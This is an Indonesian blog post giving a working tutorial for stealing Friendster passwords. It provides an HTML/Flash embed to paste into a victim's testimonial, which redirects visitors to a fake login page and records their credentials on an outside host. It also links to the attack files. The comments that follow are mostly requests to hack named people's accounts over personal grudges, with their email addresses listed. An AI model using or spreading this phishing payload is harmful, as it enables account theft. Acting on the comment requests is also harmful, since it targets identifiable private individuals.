Posted by: Fikrul Setiawan | 14 February 2008

Hacking Password Friendster

Info Lebih lanjut download tutorialnya KLIK SINI

  1. Melakukan Hacking password di friendster
    Karena banyak request hack fs tutor yg baru, langkah-langkahnya :
    Masuk ke testimonial teman anda / target anda.
  2. Masukkan :
    Quote:
    <object classid=’clsid:D27CDB6E-AE6D-11cf-96B8-444553540000′ codebase=’http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0′ width=’18′ height=’18′>
    <param name=’movie’ value=’http://www.yogyafree.net/fs.swf’>
    <param name=’quality’ value=’high’>
    <embed src=’http://www.yogyafree.net/fs.swf’ quality=’high’ pluginspage=’http://www.macromedia.com/go/getflashplayer’ type=’application/x-shockwave-flash’ width=’18′ height=’18′></embed>
    </object>
  3. Lalu tunggu beberapa waktu sampai approve testimonialnya.
  4. Setelah di approve maka anda dapat menunggu target atau para pengguna friendster membuka fs target dan tentu saja melakukan login di friendster target anda. ( Saat fs target terbuka maka dalam beberapa detik / waktu langsung berubah halaman menjadi halaman untuk login yang hasilnya akan direcord di http://www.yogyafree.net/familycode/friendster.txt)

Semuanya sudah saya buat agar bisa digunakan oleh para members yogyafree, sebagai tambahan mau download fla nya : http://www.yogyafree.net/fla.zip

Untuk uji bagaimana cara kerjanya coba masukkan alamat http://www.yogyafree.net/tes.htm maka akan redirect ke http://www.yogyafree.net/fs.swf lalu fs.swf melakukan redirect ke http://www.yogyafree.net/familycode/friendster.html

Sebagai tambahan cara ini tidak jalan jika browser target tidak mendukung flash atau IE yang No Ad-ons.


Responses

  1. tolong kirim program hack FS ke E-Mail gw please…
    gemz_230@yahoo.com

  2. tolong di hackers donk fs ini dia udah bikin gw mau bunuh diri tau

  3. hackers fs ini donk biar angus skalian soal nya dia suka transvr virus jarak jauh.fs na

    adas_soulmate@yahoo.co.id

    pleasee bgt ygh.

  4. trz klo cra blikinna lgi gmna ??
    ksih tau iia ??

    thx

  5. tlg hack fs ne donk TM_me@yahoo.com

    send paswordny qe email w d andrie1309@yahoo.com

    se xan tylg krim program hack tok fs qe email w td..

    tlg bget

  6. Gimana caranya kalau password sama emailnya di ganti??

  7. tolong kirimin hack friendster yang masih bisa ke email saya dunk.. penting nhh thx

  8. email saya chan_rocknroll_scream@hotmail.com

  9. saya mau tau password ini fs..
    rockable_me@yahoo.com
    tolong bgt..

    kirim passwordnya ke email saya..
    one_cruiser@yahoo.com

    thx be4..🙂

  10. Pleasee hack ths friendster password.. nafarin_xxx@yahoo.com bantu yaa..

  11. TLg dnk… gmn nih… fs qu gag bs dibuka lg… kyk’a password’a di ganti de..
    gmn cara’a supaya balik lg…?

  12. klu dah kirim comment ny td,trus qta bsa dpet password target drmana?

  13. tinggal nunggu di approve kan??
    trs dpt password target drmana??

  14. aku bngun caranya banggggg……

    trus mail &pasword dia kita tau lewat mana…?

  15. tlng minta passnya yang email fsnya new_noisereduction@yahoo.com dong..plis bgt kk..thx

    kirim aj ke gilangvelano@gmail.com

  16. kk ada yang salah..jgn emailnya.urlnya aj nie http://profiles.friendster.com/18995408 kirim ke emailku pass,ma usernamenya yah.. gilang_velano@yahoo.com thx kk

  17. pls kirimin password fs kk qu dunk ini alamt nya”gilang_arya645@yahoo.com”
    pls bgt yahh

  18. boss tapi gimana sekarang dari fs sendiri dia ada maintenence regular
    gw bisa share ma loe gak
    tolong dunk alamat Ym gw deidara_cute@yahoo.com
    di tunggu yah

  19. Tolong ajarin cara hack friendster dong? thx yao…

  20. saya minta tolong cari tau pasword fs ny dunk…
    godvers_lisa@yahoo.com..

    kirim ke email ini ya (serderswt@yahoo.com)
    please ya???

  21. bang kasih tau cara hack pasword fs donk saya cuma pingin tau caranya? tp yang masih bisa ya bang???

    kirim ke email ini bang (serderswt@yahoo.com)

    thx bang…

  22. Sory… Otak Q agk Lemoot…
    dah Q coba d target Script nya lewat Testimonial
    tp gagal…
    Tolong Dong Boss… Yang Detil Yach Penerangan Hack Friendsternya…

  23. pak kode html gak bisa di paste di testi friendster,trus gimana pak caranya??tolong email ke ivan_mercu@yahoo.com..thks

  24. ada software HACK FS gitu ???
    minta linknya dunks kirim ke e-mail gw yah
    /////////////////THX///////////////////////

  25. […] Credit: Fikrul Setiawan […]

  26. bang,tolongin ane dumd tolong hack’in fs Maiia_oNnenk@yahoo.com trz kirim passwordnya k alamat email ane cantika_girl_17@yahoo.com soalnya dia uda fitnah ane.pliss ya bang

  27. bang tolong cepet dan segera di hack in Maiia_oNnenk@yahoo.com trz pass nya kirim k cantika_girl_17@yahoo.com

    thankz bang

  28. bang.. ada software buat HACK friendsrer….???
    kalo ada, saya minta linknya ya..!! ^^
    n kasih tau cara penggunaanya.. ^^

    email ke saya ya..
    agustianlucky@yahoo.com

  29. bang saya lupa……..!!

    makasihnya ketinggalan
    hehehehehehehehehe😀 😀

  30. brow…. tong dong tutorialnya ngehack password nya yang jelas kirim ke email gw ni: aingyana@yahoo.com

  31. mas fikrul tolongin saya ambil Password friendster milik
    Feehilycleofizzy@yahoo.co.id atau Feehilycleofizzyprivate@yahoo.com !
    bantu saya mas,
    dia sering ngejek2 aku di depan cewek2 mas!
    tolong bener ya mas, saya nggak bisa makai tutornya situ!
    tolongin ya mas!

    nanti kalau sudah dapat, dikirim ke email aku aja = budhist@ymail.com

    toloooooong!
    please!

  32. tolong saya hack Fs berikut ini http://profiles.friendster.com/87915742…dai adalah tunangan saya… tapi saya curiga FSnya ada perselingkuhan di situ???
    tolong ya mas…tolong kirimke emailsaya:arifwahyunugroho@yahoo.com
    thaks

  33. para hacker brengsek,,,FS gw pake di hack,,,padahal gw ga pernah iseng ke orla,,,BRENGSEK,,,^_^’

  34. Ada aplikasi Hack Password yahoo n FS ga???.
    Kl ada minta linknya dunk…. .(via e-mail)

  35. fsQ keknya ud k hack . pny caranya g biar bs log in lg ? skr ak cm bs buka fs lwt hp . cz kl d hp g prnh d log out . emailQ jg g bs .
    tlg donk . .
    fsnya zee_albatross@hotmail.com


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Categories

%d bloggers like this: